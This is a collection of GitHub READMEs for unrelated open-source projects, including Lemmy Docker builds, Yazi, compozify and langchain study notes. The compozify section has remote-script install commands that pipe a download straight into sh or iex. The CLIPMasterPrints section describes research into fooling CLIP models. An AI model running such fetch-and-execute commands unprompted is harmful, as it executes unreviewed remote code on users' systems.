# lemmy-docker-multiarch [![Build Multiarch Images](https://github.com/ubergeek77/lemmy-docker-multiarch/actions/workflows/build-multiarch.yml/badge.svg?branch=main)](https://github.com/ubergeek77/lemmy-docker-multiarch/actions/workflows/build-multiarch.yml) A build repository for multiarch Docker images for Lemmy. Builds [`LemmyNet/lemmy`](https://github.com/LemmyNet/lemmy/) and [`LemmyNet/lemmy-ui`](https://github.com/LemmyNet/lemmy-ui/) for: - x64 (`amd64`) - ARM (`arm/v7`) - ARM64 (`arm64`) I made these because the Lemmy project does not currently support ARM, [and has been deliberating how to create ARM builds since `0.17.4`](https://github.com/LemmyNet/lemmy/issues/3102). The Dockerfiles I use, and the workflow I use to compile these images, are all open source here. [You can see the logs of previous runs on the Actions tab](https://github.com/ubergeek77/lemmy-docker-multiarch/actions/workflows/build-multiarch.yml). When [`LemmyNet/lemmy`](https://github.com/LemmyNet/lemmy/) or [`LemmyNet/lemmy-ui`](https://github.com/LemmyNet/lemmy-ui/) have new tags, my workflow will automatically be launched and those new tags will be built. These images are primarily here so they can be used in my [Lemmy-Easy-Deploy](https://github.com/ubergeek77/Lemmy-Easy-Deploy) project. However, you may use these images manually if you like. They are drop-in replacements for the official Lemmy images. I don't tag `latest`, so you will need to specify a tag to pull. For example, to use `0.18.0`: ``` ghcr.io/ubergeek77/lemmy:0.18.0 ghcr.io/ubergeek77/lemmy-ui:0.18.0 ``` I also build `rc` tags. In general, I will have images for any stable or `rc` tag of the official Lemmy repositories. To see the full list of tags I've built, check the Packages section on this repo, or go to the images directly: - https://github.com/ubergeek77/lemmy-docker-multiarch/pkgs/container/lemmy - https://github.com/ubergeek77/lemmy-docker-multiarch/pkgs/container/lemmy-ui
wibus-wee/icalingua-theme-telegram
https://github.com/wibus-wee/icalingua-theme-telegram
A Telegram-like theme based on icalingua++
<div> <a href="https://github.com/wibus-wee/icalingua-theme-telegram"> <img align="right" width="200" src="https://github.com/wibus-wee/icalingua-theme-telegram/assets/62133302/563396b0-9211-409a-9136-74a6f3cad037#gh-light-mode-only" /> </a> <a href="https://github.com/wibus-wee/icalingua-theme-telegram"> <img align="right" width="200" src="https://github.com/wibus-wee/icalingua-theme-telegram/assets/62133302/115cdb16-88fa-4ba6-9a14-32b9ab669b1b#gh-dark-mode-only" /> </a> </div> # Telegram Theme For Icalingua++ 一个基于 [Icalingua++](https://github.com/Icalingua-plus-plus/Icalingua-plus-plus) 的 Telegram 风格主题。 ## Motivation | 动机 我非常喜欢 Telegram Desktop 的 UI,但是在很多时候我都没法访问 Telegram,并且地区使用习惯的原因,我很难使用 Telegram,而是使用 QQ。 但是 Tencent QQ NT 版本的 UI 完全没有办法自由定制,即使定制成功了也是 HACK 进去的,对这款软件来说它并不合法。所以我决定使用 Icalingua++ 来实现这个主题。它完全可以实现 Telegram 的 UI,而且它是开源的,可以让更多的人使用。 > 总结:**QQ NT 一坨屎,Icalingua++ 大大滴好!** 但其实这个主题与其名曰主题,不如说是一个增强版的 Icalingua++,因为它不仅仅是一个主题,它还会增强 Icalingua++ 的功能与体验。 ## Attentions | 注意事项 - 由于 Icalingua++ 的限制,我改变了消息列表的 DOM 结构,所以我暂时无法实现点击图片放大的功能。后续可能我会尝试重写灯箱来实现这个功能。[Issue #16](https://github.com/wibus-wee/icalingua-theme-telegram/issues/16) - 它**强制改变**了很多原本的**DOM结构**,这可能会导致一些功能出现问题,如果你发现了这些问题,欢迎提交 [Issue](https://github.com/wibus-wee/icalingua-theme-telegram/issues)。 - 由于我们想要增强聊天功能,我们可能需要另外启动一个子进程来处理一些信息。如果你**不信任我 / 不信任仓库代码**,你可以不使用这个主题。 - 在 [#32](https://github.com/wibus-wee/icalingua-theme-telegram/pull/32) 中,我实现了手动控制功能启动功能,你现在可以在 `config.js` 中设置你想要启动的功能了,你也可以将 `manual` 设置为 `false` 来启动所有功能。有关更多配置信息,请参阅 [Config | 配置](#config--配置)。 ## Features | 特性 - **基础样式。** 将 Telegram 的大部分样式移植到 Icalingua++。 - **深度修改。** 将同一联系人的多条消息合并为一条,以减少界面占用。 - **更好的图片信息显示效果。** 以更好的方式显示图片信息。 - **新图标。** 用 Telegram 风格的图标替换图标。 - **漂亮的模态框。** 更改模态框的样式,使其更加美观。 - **不同的用户名颜色。** 为每个用户名分配不同的颜色,以便更好地区分不同的联系人。 - **良好的动效。** 为 Icalingua++ 移除与主题不和谐的动效以及添加更多合理的动效。 - **更多样式。** 将添加更多样式,使 Icalingua++ 更像 Telegram。 - **更好的开发体验。** 自动重载样式和页面,以便开发者更好地开发主题。 ## Installation | 安装 ### Automatic | 自动安装 1. 下载最新的发布版本或从 [CI Release](https://github.com/wibus-wee/icalingua-theme-telegram/releases) 下载最新的构建版本。 2. 给予执行权限 `chmod +x install.sh` 3. 在解压缩包后的目录下运行 `./install.sh`。 4. 重启 Icalingua++。 ### Manual | 手动安装 #### 从 CI 下载 1. 下载最新的发布版本或从 [CI Release](https://github.com/wibus-wee/icalingua-theme-telegram/releases) 下载最新的构建版本。 2. 将 `addon.js`, `style.css`, `main.js`, `config.js` 复制到 Icalingua++ 的[数据目录](https://github.com/Icalingua-plus-plus/Icalingua-plus-plus#%E9%BB%98%E8%AE%A4%E6%95%B0%E6%8D%AE%E7%9B%AE%E5%BD%95) 3. 重启 Icalingua++。 #### 从源码安装 1. 克隆这个仓库。 2. 安装依赖 `pnpm install`。 3. 给予执行权限 `chmod +x dist/install.sh`。 4. 运行 `cd dist && ./install.sh`。 5. 重启 Icalingua++。 ## Enhancements & Feat. 
| 增强 & 新功能 这个文件用于帮助一些由于 DOM 结构的原因无法直接通过改变 CSS 实现目标样式的元素。已经实现的功能有: - [x] 获取 ChatGroup 的宽度以改变 ChatGroup Aside 为 Telegram 风格的头部菜单栏。 - [x] 合并同一联系人的多条消息为一条。 - [x] 更好的图片信息显示效果。(仅针对单张图片消息) - [x] 移除回复消息的图标并改为点击即可回复消息的样式。 - [x] 为每个用户名分配不同的颜色。 - [x] 自动重载 CSS 和 JS 文件。 - [x] 手动控制功能启动功能。 - [ ] 全新的图像显示器。 - [ ] 主题自动更新器。 - [ ] 用 Telegram 风格的图标替换图标。 - [ ] 更改模态框的样式,使其更加美观。 - [ ] 鼠标滑动以回复消息 ## Config | 配置 在 [#32](https://github.com/wibus-wee/icalingua-theme-telegram/pull/32) 中,我们引入了一个新的配置文件 `config.js`,你可以在这个文件中配置你想要启动的功能。有关这个文件的配置项定义,你可以前往 [types.d.ts](./types.d.ts) 查看。在此我简单介绍一下配置项: > **Note** > > **不知道咋写的先学下 JavaScript 吧,或者将 `manual` 设置为 false,这样所有功能都会启动。** ### core -- 启动的核心功能 你可以去前往 [core](./src/core//index.ts) 查看所有的核心功能。你需要填入的是核心功能的 Key。如: 在文件里有一行代码: ```ts "modify-chat-box-interval": modifyChatBoxInterval, ``` 我想启动这个功能,那么你在 config.js 的 core 中需要填入的是 [`modify-chat-box-interval`],以此类推。 ### chatbox --- 启动的聊天框修改功能 与 [core](#core----启动的核心功能) 类似,你可以去前往 [chatbox](./src/functions/index.ts) 查看所有的聊天框修改功能。你需要填入的是聊天框修改功能的 Key。 ### 其他注意事项 - 你可以在 `config.js` 中设置 `manual` 为 `false` 来启动所有功能。 - 当 `dev` 为 `true` 且你启动了 `fileChangesListener` 时,当你对 JS 文件进行修改时,Icalingua++ 会自动重载窗口,对 CSS 文件修改时,Icalingua++ 会自动重载 CSS 文件。 - 当 `dev` 为 `true` 时,全部功能都会启动,你无法通过 `manual` 或其他办法来关闭功能(除了删代码 🙂)。 - 修改了 `config.js` 后,你需要重启 / 重载 Icalingua++ 才能使配置生效。 - 你如果“不小心”填错了功能的 Key,你大可以放心这个功能是不会被启动的,并且在控制台会有错误警告。 - 如果你对这种**控制台乱拉屎**的行为非常厌恶 🤬,你可以将 `log` 设置为 `false` 来关闭控制台输出。 ## Preview |Light|Dark| |---|---| |<img alt="light" src="https://github.com/wibus-wee/icalingua-theme-telegram/assets/62133302/841d7e5e-5e82-4373-9983-f61903879c86">|<img alt="dark" src="https://github.com/wibus-wee/icalingua-theme-telegram/assets/62133302/e07826bd-99a8-49fb-96b6-c7dad19cf16e">| ## Author Telegram Theme For Icalingua++ © Wibus, Released under AGPLv3. Created on Jul 1, 2023 > [Personal Website](http://wibus.ren/) · [Blog](https://blog.wibus.ren/) · GitHub [@wibus-wee](https://github.com/wibus-wee/) · Telegram [@wibus✪](https://t.me/wibus_wee)
matfrei/CLIPMasterPrints
https://github.com/matfrei/CLIPMasterPrints
Code for CLIPMasterPrints: Fooling Contrastive Language-Image Pre-training Using Latent Variable Evolution
# CLIPMasterPrints: Fooling Contrastive Language-Image Pre-training Using Latent Variable Evolution [![Paper](https://img.shields.io/badge/paper-arxiv.2307.03798-B31B1B.svg)](https://arxiv.org/abs/2307.03798) ![alt text](static/demo.gif) Installation ------- clipmasterprints builds upon the Stable Diffusion conda environment and decoder model. To run the code in the repository, you need to download and set up both: ``` mkdir external cd external # clone repository git clone https://github.com/CompVis/stable-diffusion.git cd stable-diffusion # check out the correct commit git checkout 69ae4b35e0a0f6ee1af8bb9a5d0016ccb27e36dc # create and activate conda env with SD dependencies conda env create -f environment.yaml conda activate ldm # install SD from source into conda env pip install -e . # move previously downloaded SD sd-v1-4.ckpt into correct folder # (Refer to https://github.com/CompVis/ for where to download the checkpoint) ln -s <path/to/sd-v1-4.ckpt> models/ldm/stable-diffusion-v1/model.ckpt # return to base dir cd ../.. ``` After all Stable Diffusion dependencies are installed, install the package from source using ``` git clone https://github.com/matfrei/CLIPMasterPrints.git cd CLIPMasterPrints pip install -e . ``` Mining and evaluating CLIPMasterPrints ------- To mine fooling master images, use ``` python train/mine.py --config-path config/<config-name>.yaml ``` where ```<config-name>``` is a placeholder for the desired config file. Use ```cmp_artworks.yaml``` to target artwork captions or ```cmp_imagenet_classes_*.yaml``` to reproduce our experiments on ImageNet class captions. To display some plots for mined images, execute ``` python eval/eval_results.py ``` Authors ------- Matthias Freiberger <[email protected]> Peter Kun <[email protected]> Anders Sundnes Løvlie <[email protected]> Sebastian Risi <[email protected]> Citation ------ If you use the code for academic or commercial purposes, please cite the associated paper: ``` @misc{https://doi.org/10.48550/arXiv.2307.03798, doi = {10.48550/ARXIV.2307.03798}, url = {https://arxiv.org/abs/2307.03798}, author = {Freiberger, Matthias and Kun, Peter and Løvlie, Anders Sundnes and Risi, Sebastian}, title = {CLIPMasterPrints: Fooling Contrastive Language-Image Pre-training Using Latent Variable Evolution}, publisher = {arXiv}, year = {2023}, } ```
sxyazi/yazi
https://github.com/sxyazi/yazi
⚡️ Blazing fast terminal file manager written in Rust, based on async I/O.
## Yazi - ⚡️ Blazing Fast Terminal File Manager Yazi ("duck" in Chinese) is a terminal file manager written in Rust, based on non-blocking async I/O. It aims to provide an efficient, user-friendly, and configurable file management experience. https://github.com/sxyazi/yazi/assets/17523360/740a41f4-3d24-4287-952c-3aec51520a32 ⚠️ Note: Yazi is currently in active development and may be unstable. The API is subject to change without prior notice. ## Installation Before getting started, ensure that the following dependencies are installed on your system: - nerd-fonts (required, for icons) - jq (optional, for JSON preview) - unar (optional, for archive preview) - ffmpegthumbnailer (optional, for video thumbnails) - fd (optional, for file searching) - rg (optional, for file content searching) - fzf (optional, for directory jumping) - zoxide (optional, for directory jumping) ### Arch Linux Install with paru or your favorite AUR helper: ```bash paru -S yazi jq unarchiver ffmpegthumbnailer fd ripgrep fzf zoxide ``` ### macOS Install the dependencies with Homebrew: ```bash brew install jq unar ffmpegthumbnailer fd ripgrep fzf zoxide brew tap homebrew/cask-fonts && brew install --cask font-symbols-only-nerd-font ``` And download the latest release [from here](https://github.com/sxyazi/yazi/releases). Or you can install Yazi via cargo: ```bash cargo install --git https://github.com/sxyazi/yazi.git ``` ### Nix Nix users can install Yazi from [the NUR](https://github.com/nix-community/nur-combined/blob/master/repos/xyenon/pkgs/yazi/default.nix): ```bash nix-env -iA nur.repos.xyenon.yazi ``` Or add the following to your configuration: ```nix # configuration.nix environment.systemPackages = with pkgs; [ nur.repos.xyenon.yazi ]; ``` ### Build from source Execute the following commands to clone the project and build Yazi: ```bash git clone https://github.com/sxyazi/yazi.git cd yazi cargo build --release ``` Then, you can run: ```bash ./target/release/yazi ``` ## Usage ```bash yazi ``` If you want to use your own config, copy the [config folder](https://github.com/sxyazi/yazi/tree/main/config) to `~/.config/yazi`, and modify it as you like. ## Image Preview | Platform | Protocol | Support | | ------------- | -------------------------------------------------------------------------------- | --------------------- | | Kitty | [Terminal graphics protocol](https://sw.kovidgoyal.net/kitty/graphics-protocol/) | ✅ Built-in | | WezTerm | [Terminal graphics protocol](https://sw.kovidgoyal.net/kitty/graphics-protocol/) | ✅ Built-in | | Konsole | [Terminal graphics protocol](https://sw.kovidgoyal.net/kitty/graphics-protocol/) | ✅ Built-in | | iTerm2 | [Inline Images Protocol](https://iterm2.com/documentation-images.html) | ✅ Built-in | | Hyper | Sixel | ☑️ Überzug++ required | | foot | Sixel | ☑️ Überzug++ required | | X11 / Wayland | Window system protocol | ☑️ Überzug++ required | | Fallback | [Chafa](https://hpjansson.org/chafa/) | ☑️ Überzug++ required | Yazi automatically selects the appropriate preview method for you, based on the priority from top to bottom. That's relying on the `$TERM`, `$TERM_PROGRAM`, and `$XDG_SESSION_TYPE` variables, make sure you don't overwrite them by mistake! For instance, if your terminal is Alacritty, which doesn't support displaying images itself, but you are running on an X11/Wayland environment, it will automatically use the "Window system protocol" to display images -- this requires you to have [Überzug++](https://github.com/jstkdng/ueberzugpp) installed. 
## TODO - [x] Add example config for general usage; for now, please see my [other repo](https://github.com/sxyazi/dotfiles/tree/main/yazi) instead - [x] Integration with fzf, zoxide for fast directory navigation - [x] Integration with fd, rg for fuzzy file searching - [x] Documentation of commands and options - [x] Support for Überzug++ for image previews in X11/Wayland environments - [ ] Batch renaming support ## License Yazi is MIT licensed.
mani-sh-reddy/Lunar-Lemmy-iOS
https://github.com/mani-sh-reddy/Lunar-Lemmy-iOS
Lunar is an iOS app that serves as a client for Lemmy, the open-source federated alternative to Reddit
# Lunar - An iOS Client for Lemmy [![GitHub release](https://img.shields.io/github/v/release/mani-sh-reddy/Lunar-Lemmy-iOS)](https://github.com/mani-sh-reddy/Lunar-Lemmy-iOS/releases) ![Cocoapods platforms](https://img.shields.io/cocoapods/p/ios) [![Static Badge](https://img.shields.io/badge/Swift-5.9-orange?logo=swift&logoColor=orange)](https://www.swift.org/about/) [![Static Badge](https://img.shields.io/badge/SwiftUI-3.0-blue?logo=swift&logoColor=blue) ](https://developer.apple.com/xcode/swiftui/) [![GitHub last commit (branch)](https://img.shields.io/github/last-commit/mani-sh-reddy/Lunar-Lemmy-iOS/dev)](https://github.com/mani-sh-reddy/Lunar-Lemmy-iOS/commits/main) [![license: GPL v3](https://img.shields.io/badge/license-GPLv3-maroon.svg)](https://www.gnu.org/licenses/gpl-3.0) Lunar is an iOS app that serves as a client for [Lemmy, the open-source federated alternative to Reddit](https://join-lemmy.org/instances) ![Lunar App Screenshots](Screenshots/LunarIconScreenshots.png) ## Getting Started Lunar is currently in its alpha testing phase and, as a result, it has not been released on the app store or TestFlight yet. However, you can still install Lunar on your iOS device by following these steps: 1. Ensure you have an Apple developer account. If you don't have one, you can create a free developer account by visiting this link: https://developer.apple.com 2. Clone the Lunar repository and open Lunar.xcodeproj. 3. In Xcode, select your project, go to the "General" tab, and choose "Automatically manage signing" and your personal team. 4. Connect your iPhone to your computer and select it as the run destination. 5. Run your project. After a successful build, you might encounter an error in Xcode stating that your app is not from a trustworthy source. 6. To resolve this issue, navigate to your device's Settings, search for "Device Management," select your profile name, and then click "Trust." 7. Now, you can run your app again, and it should work without any issues. ## Components [Alamofire](https://github.com/Alamofire/Alamofire) - Elegant HTTP Networking in Swift [Kingfisher](https://github.com/onevcat/Kingfisher) - A lightweight, pure-Swift library for downloading and caching images from the web. ## Contributing Contributions are welcome! If you would like to contribute, please create a pull request with your changes. ## License Lunar is released under the [GPL-3.0 license](https://choosealicense.com/licenses/gpl-3.0/). See the `LICENSE` file for more information. ## Contact If you would like to give feedback or any suggestions, please open a [discussion](https://github.com/mani-sh-reddy/Lunar-Lemmy-iOS/discussions).
codingburgas/2223-otj-10-project-python-web-scraper-GSTabanov20
https://github.com/codingburgas/2223-otj-10-project-python-web-scraper-GSTabanov20
2223-otj-10-project-python-web-scraper-GSTabanov20 created by GitHub Classroom
## Cryptocurrency Data Display This Python script fetches data from the CoinMarketCap website and displays information about popular cryptocurrencies, trending cryptocurrencies, top gainers, and top losers. The data is scraped using the `requests` library and parsed using the `BeautifulSoup` library. ## Installation To run this script, you need to have Python installed on your system. ### Dependencies The following libraries are required to run the script: - `requests`: Used to send HTTP requests and fetch the webpage content. - `beautifulsoup4`: Used to parse the HTML content and extract data from it. You can install these libraries using the following command: pip install requests beautifulsoup4 Make sure you have pip installed and it is up to date. If you don't have pip installed, you can refer to the official Python documentation for instructions on how to install it. ## Usage Once you have installed the required libraries, you can run the script by executing the following command: ```python python main.py ``` The script will fetch the data from the CoinMarketCap website and display a menu with the following options: 1. Popular Cryptocurrencies 2. Trending Cryptocurrencies (currently under development) 3. Top Gainers (currently under development) 4. Top Losers (currently under development) To select an option, enter the corresponding number and press Enter. Option 1 will display information about popular cryptocurrencies, including their names, prices, and 24-hour trading volumes. After displaying the information, you will be prompted with two options: to go back to the menu or exit the script. Options 2, 3, and 4 are currently under development and will display a message indicating that. You will be presented with the same options to go back to the menu or exit the script. If you enter an invalid choice, an error message will be displayed, and you will be prompted to enter a valid choice. ## Disclaimer This script fetches data from the CoinMarketCap website, which is a third-party platform. The availability and accuracy of the data depend on the CoinMarketCap website's stability and functionality. OpenAI and the author of this script do not guarantee the availability or accuracy of the data displayed by the script. Please use this script responsibly and adhere to any applicable terms of service or usage guidelines provided by CoinMarketCap. ## Contributions Contributions to this script are welcome. If you have any suggestions or improvements, feel free to fork the script's repository and submit a pull request with your changes.
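As a rough illustration of the requests + BeautifulSoup pattern the script is built on, here is a minimal sketch. The selectors are placeholders, not the script's actual ones; CoinMarketCap's markup changes frequently, so adjust them to the live page:

```python
import requests
from bs4 import BeautifulSoup

headers = {"User-Agent": "Mozilla/5.0"}  # some sites reject the default client UA
html = requests.get("https://coinmarketcap.com/", headers=headers, timeout=10).text
soup = BeautifulSoup(html, "html.parser")

# Grab the first ten rows of the main table and print their raw cell text;
# mapping cells to name/price/volume depends on the current page layout.
for row in soup.select("table tbody tr")[:10]:
    cells = [td.get_text(strip=True) for td in row.find_all("td")]
    print(cells)
```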
profclems/compozify
https://github.com/profclems/compozify
Convert "docker run" commands to docker compose files
# Compozify Compozify is a simple (yet complicated) tool to generate a `docker-compose.yml` file from a `docker run` command. # Usage ## Screenshot ![image](https://github.com/profclems/compozify/assets/41906128/bcd27512-8692-44f3-9113-63bfb112e38e) ## Installation Download a binary suitable for your OS at the [releases page](https://github.com/profclems/compozify/releases/latest). ### Quick install #### Linux and macOS ```sh curl -sfL https://raw.githubusercontent.com/profclems/compozify/main/install.sh | sh ``` #### Windows (PowerShell) Open a PowerShell terminal (version 5.1 or later) and run: ```powershell Set-ExecutionPolicy RemoteSigned -Scope CurrentUser # Optional: Needed to run a remote script the first time irm https://raw.githubusercontent.com/profclems/compozify/main/install.ps1 | iex ``` ### From source #### Prerequisites for building from source - `make` - Go 1.18+ 1. Verify that you have Go 1.18+ installed ```sh go version ``` If `go` is not installed, follow instructions on [the Go website](https://golang.org/doc/install). 2. Clone this repository ```sh git clone https://github.com/profclems/compozify.git cd compozify ``` If you have `$GOPATH/bin` or `$GOBIN` in your `$PATH`, you can just install with `make install` (install compozify in `$GOPATH/bin`) and **skip steps 3 and 4**. 3. Build the project ```sh make build ``` 4. Change PATH to find newly compiled `compozify` ```sh export PATH=$PWD/bin:$PATH ``` 5. Run `compozify --version` to confirm that it worked ## License Copyright © [Clement Sam](https://twitter.com/clems_dev) `compozify` is open-sourced software licensed under the [MIT](LICENSE) license.
avikumart/LLM-GenAI-Transformers-Notebooks
https://github.com/avikumart/LLM-GenAI-Transformers-Notebooks
A repository containing all the LLM notebooks with tutorials and projects
# LLM-GenAI-Transformers-Notebooks A repository containing all the LLM notebooks with tutorials and projects ### The focus areas of this repository: 1. Transformers tutorials and notebooks 2. LLM notebooks and their applications 3. Tools and technologies of GenAI 4. Courses list in GenAI 5. Generative AI blogs/articles 🤖 Contributions are welcome...
taishan1994/langchain-learning
https://github.com/taishan1994/langchain-learning
langchain study notes, covering langchain source-code walkthroughs, using Chinese models with langchain, langchain examples, and more.
# langchain-learning langchain的学习笔记。依赖: ```python openai==0.27.8 langchian==0.0.225 ``` 和langchain相类似的一些工具: - [danswer-ai/danswer: Ask Questions in natural language and get Answers backed by private sources. Connects to tools like Slack, GitHub, Confluence, etc.](https://github.com/danswer-ai/danswer) ## **文章** **注意:由于langchain或langchain-ChatGLM的更新,可能导致部分源码和讲解的有所差异。** 有的一些文章直接放的是一些链接,从网上收集整理而来。 **** - langchain组件-数据连接(data connection) - langchain组件-模型IO(model IO) - langchain组件-链(chains) - langchain组件-代理(agents) - langchain组件-内存(memory) - langchain组件-回调(callbacks) - langchain中ChatOpenAI背后做了什么.md - langchain.load.serializable.py.md - langchain中的一些schema.md - langchain中是怎么调用chatgpt的接口的.md - langchain结构化输出背后的原理,md - langchain中memory的工作原理.md - langchain怎么确保输出符合道德期望.md - langchain中路由链LLMRouterChain的原理.md - langchain中的EmbeddingRouterChain原理.md - langchain集成GPTCache.md - langchain集成Mivus向量数据库.md - langchain中的StreamingStdOutCallbackHandler原理.md - pydantic中config的一些配置.md - pydantic中的Serializable和root_validator.md - python中常用的一些魔术方法.md - python的typing常用的类型.md - python中functools的partial的用法.md - python中inspect的signature用法.md - python中args和kwargs.md - [我为什么放弃了 LangChain? - 知乎 (zhihu.com)](https://zhuanlan.zhihu.com/p/645358531) 目前基于langchain的中文项目有两个: - https://github.com/yanqiangmiffy/Chinese-LangChain - https://github.com/imClumsyPanda/langchain-ChatGLM 我们从中可以学到不少。 #### langchain-ChatGLM - 使用api部署langchain-chatglm的基本原理.md - 上传文档时发生了什么.md - 关于HuggingFaceEmbeddings.md - 关于InMemoryDocstore.md - 关于CharacterTextSplitter.md - 关于TextLoader.md - 关于怎么调用bing的搜索接口.md - 根据query得到相关的doc的原理.md - 根据查询出的docs和query生成prompt.md - 根据prompt用模型生成结果.md - [ChatGPT小型平替之ChatGLM-6B本地化部署、接入本地知识库体验 | 京东云技术团队](https://juejin.cn/post/7246408135015415868) ## **中文例子** - 定制中文LLM模型 - 定制中文聊天模型 - 使用中文splitter.md - 根据query查询docs.md - mini-langchain-ChatGLM.md - 打造简易版类小爱同学助手.md - chatglm实现agent控制.md - [向量检索增强chatglm生成-结合ES](https://zhuanlan.zhihu.com/p/644619003) - [知识图谱抽取LLM - 知乎 (zhihu.com)](https://zhuanlan.zhihu.com/p/645509983) ## **英文例子** - langchain使用openai例子.md(文本翻译) - openai调用chatgpt例子.md - langchain解析结果并格式化输出.md - langchain带有记忆的对话.md - langchain中使用不同链.md - langchain基于文档的问答md - [使用GGML和LangChain在CPU上运行量化的llama2](https://zhuanlan.zhihu.com/p/644701608) - [本地部署开源大模型的完整教程:LangChain + Streamlit+ Llama - 知乎 (zhihu.com)](https://zhuanlan.zhihu.com/p/639565332) ## prompt工程.md 一个优化的prompt对结果至关重要,感兴趣的可以去看看这个。 [yzfly/LangGPT: LangGPT: Empowering everyone to become a prompt expert!🚀 Structured Prompt,结构化提示词。 (github.com)](https://github.com/yzfly/LangGPT):构建结构化的高质量prompt ## **langchain可能存在一些问题** 虽然langchain给我们提供了一些便利,但是也存在一些问题: - **无法解决大模型基础技术问题,主要是prompt重用问题**:首先很多大模型应用的问题都是大模型基础技术的缺陷,并不是LangChain能够解决的。其中核心的问题是大模型的开发主要工作是prompt工程。而这一点的重用性很低。但是,这些功能都**需要非常定制的手写prompt**。链中的每一步都需要手写prompt。输入数据必须以非常特定的方式格式化,以生成该功能/链步骤的良好输出。设置DAG编排来运行这些链的部分只占工作的5%,95%的工作实际上只是在提示调整和数据序列化格式上。这些东西都是**不可重用**的。 - **LangChain糟糕的抽象与隐藏的垃圾prompt造成开发的困难**:简单说,就是LangChain的抽象工作不够好,所以很多步骤需要自己构建。而且LangChain内置的很多prompt都很差,不如自己构造,但是它们又隐藏了这些默认prompt。 - **LangChain框架很难debug**:**尽管LangChain很多方法提供打印详细信息的参数,但是实际上它们并没有很多有价值的信息**。例如,如果你想看到实际的prompt或者LLM查询等,都是十分困难的。原因和刚才一样,LangChain大多数时候都是隐藏了自己内部的prompt。所以如果你使用LangChain开发效果不好,你想去调试代码看看哪些prompt有问题,那就很难。 - **LangChain鼓励工具锁定**:LangChain鼓励用户在其平台上进行开发和操作,但是如果用户需要进行一些LangChain文档中没有涵盖的工作流程,即使有自定义代理,也很难进行修改。这就意味着,一旦用户开始使用LangChain,他们可能会发现自己被限制在LangChain的特定工具和功能中,而无法轻易地切换到其他可能更适合他们需求的工具或平台。 以上内容来自: - [Langchain Is Pointless | Hacker News (ycombinator.com)](https://news.ycombinator.com/item?id=36645575) - [使用LangChain做大模型开发的一些问题:来自Hacker 
News的激烈讨论~](https://zhuanlan.zhihu.com/p/642498874) 有时候一些简单的任务,我们完全可以自己去实现相关的流程,这样**每一部分都由我们自己把控**,更易于修改。 # 使用langchain解决复杂任务 ## 方法一:领域微调LLM 使用领域数据对LLM进行微调,受限于计算资源和模型参数的大小,而且模型会存在胡言乱语的情况。这里面涉及到一系列的问题: - 数据怎么获取,怎么进行数据清理。 - 分词使用什么方式。 - 模型采用什么架构,怎么训练,怎么评估模型。 - 模型怎么进行有效推理,怎么进行部署。 - 领域预训练、领域指令微调、奖励模型、结果对齐。 ## 方法二:langchain + LLM + tools 基本思路: 1、用户提问:请对比下商品雅诗兰黛特润修护肌活精华露和SK-II护肤精华? 2、RouterChain问题路由,即使用哪种方式回答问题:(调用一次LLM) - RouterChain可以是一个LLM,也可以是一个embedding,去匹配到合适的解决方案,如果没有匹配到任何解决方案,则使用模型内部知识进行回答。 - 这里匹配到**商品对比**这一问题,得到解决方案:(1)调用商品搜索工具得到每一个商品的介绍。(2)通过搜索结果对比这些商品。 3、使用Planner生成step:(调用一次LLM) - 根据解决方案生成合适的steps,比如:(1)搜索雅诗兰黛特润修护肌活精华露。(2)搜索SK-II护肤精华。(3)对比上述商品。 4、执行者Executer执行上述步骤:(调用steps次LLM,n是超参数表明调用的最大次数) - 需要提供工具,每个step的问题,需要调用llm生成每个工具的调用参数。 - 调用工具获取结果。 5、对所有的结果进行汇总。(调用一次LLM) ## 方法三:langchain + LLM + 检索 相比于方案1,不使用工具,直接根据问题进行对数据库进行检索,然后对检索到的结果进行回答。 检索的方式可以是基于给定问题的关键字,使用ES工具从海量数据库中检索到可能存在答案的topk段落。把这topk个段落连同问题一起发送给LLM,进行回答。 检索的方式改成向量的形式,先对所有已知资料按照300个字切分成小的段落,然后对这些段落进行编码成向量,当用户提问时,把用户问题同样编码成向量,然后对这些段落进行检索,得到topk最相关的段落,把这topk个段落连同问题一起发送给LLM,进行回答。 ![图片](README.assets/640.png) **上述方法的优缺点:** **领域微调LLM**:需要耗费很多的人力收集领域内数据和问答对,需要耗费很多算力进行微调。 **langchain + LLM + tools**:是把LLM作为一个子的服务,LangChain作为计划者和执行者的大脑,合适的时机调用LLM,优点是解决复杂问题,缺点是不可靠。LLM生成根据问题和工具调用工具获取数据时不可靠。可以不能很好的利用工具。可能不能按照指令调用合适的工具,还可能设定计划差,难以控制。优点是:用于解决复杂的问题。 **langchain + LLM + 检索**:优点是现在的领域内主流问答结构,缺点:是根据问题对可能包含答案的段落检索时可能检索不准。不适用于复杂问答 **总结:最大的问题还是LLM本身:** - LLM输出的不可控性,会导致后续步骤出现偏差。 - LLM的输入的context的长度问题:目前已经可以把长度推广到10亿以上了。 - 训练一个LLM需要的成本:对于数据而言,除了人工收集整理外,也可以使用大模型进行生成;对于训练而言,目前也有不少基于参数有效微调的例子。 - LLM的部署问题:也已经有不少加速推理的方法,比如量化、压缩、使用分布式进行部署、使用C++进行部署等。 LLM是整个系统的基座,目前还是有不少选择的余地的,网上开源了不少中文大语言模型,但大多都是6B/7B/13B的,要想有一个聪明的大脑,模型的参数量还是需要有保证的。 以上参考:[https://mp.weixin.qq.com/s/FvRchiT0c0xHYscO_D-sdA](https://python.langchain.com.cn/docs/modules/agents/how_to/custom_llm_chat_agent) # 扩展 留出一些问题以待思考:可能和langchain相关,也可能和大模型相关 - **怎么根据垂直领域的数据选择中文大模型?**1、是否可以商用。2、根据各评测的排行版。3、在自己领域数据上进行评测。4、借鉴现有的垂直领域模型的选择,比如金融大模型、法律大模型、医疗大模型等。 - **数据的一个答案由一系列相连的句子构成,怎么对文本进行切分以获得完整的答案?**比如: ```python 怎么能够解决失眠? 1、保持良好的心情; 2、进行适当的训练。 3、可适当使用药物。 ``` 1、尽量将划分的文本的长度设置大一些。2、为了避免答案被分割,可以设置不同段之间可以重复一定的文本。3、检索时可返回前top_k个文档。4、融合查询出的多个文本,利用LLM进行总结。 - **怎么构建垂直领域的embedding?** - **怎么存储获得的embedding?** - **如何引导LLM更好的思考?** 可使用:**chain of thoughts、self ask、ReAct**,具体介绍可以看这一篇文章:https://zhuanlan.zhihu.com/p/622617292 实际上,langchain中就使用了ReAct这一策略。 # 参考 > [Introduction | 🦜️🔗 Langchain](https://python.langchain.com/docs/get_started/introduction.html) > > [API Reference — 🦜🔗 LangChain 0.0.229](https://api.python.langchain.com/en/latest/api_reference.html) > > [https://mp.weixin.qq.com/s/FvRchiT0c0xHYscO_D-sdA](https://python.langchain.com.cn/docs/modules/agents/how_to/custom_llm_chat_agent) > 